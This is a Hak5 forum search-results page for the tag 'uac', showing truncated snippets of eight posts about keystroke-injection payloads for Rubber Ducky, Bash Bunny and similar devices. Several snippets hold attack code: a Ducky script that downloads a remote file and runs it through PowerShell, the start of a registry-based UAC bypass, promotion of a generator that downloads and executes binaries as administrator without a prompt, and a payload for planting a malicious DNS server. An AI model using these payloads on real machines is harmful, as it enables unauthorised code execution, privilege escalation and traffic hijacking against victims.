Jump to content

Search the Community

Showing results for tags 'uac'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 8 results

  1. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated. (The command at the bottom is for the P4wnP1 A.L.O.A) Q GUI R Q powershell Q ENTER Q DELAY 500 Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\";
  2. Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([Syst
  3. I just got my new Ducky today but I'm getting no love with anything else but Hello World :( The problem seems to be the UAC security. I'm using Windows 7. The command ALT y does not work. It's not a delay issue, I played with that to all extents. It seems to be a focus problem where the ALT y is being sent to another window as the UAC Window does not have focus when it pops up. Am I the only one with this issue? Is there a reliable work around to bring focus to a specific window or anther fix? Without being able to get passed the UAC check, the Ducky would be rather Sucky.
  4. Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads
  5. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to
  6. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered w
  7. Hi I'm new and just got my Rubber Ducky. Why can't I bypass UAC? Am I doing something wrong? It pops up with the UAC password prompt screen. "Do you want to allow the following program to make changes to this computer?" and then it asks for the password. Here's the code I'm using. GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds This doesn't work either DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER I'm running Windows 7 SP1
  8. Hello gentleman, Sorry in advance if this issue have been answered before, I was searching the forum for some information and did´nt found something that clarify my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can´t submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quac
×
×
  • Create New...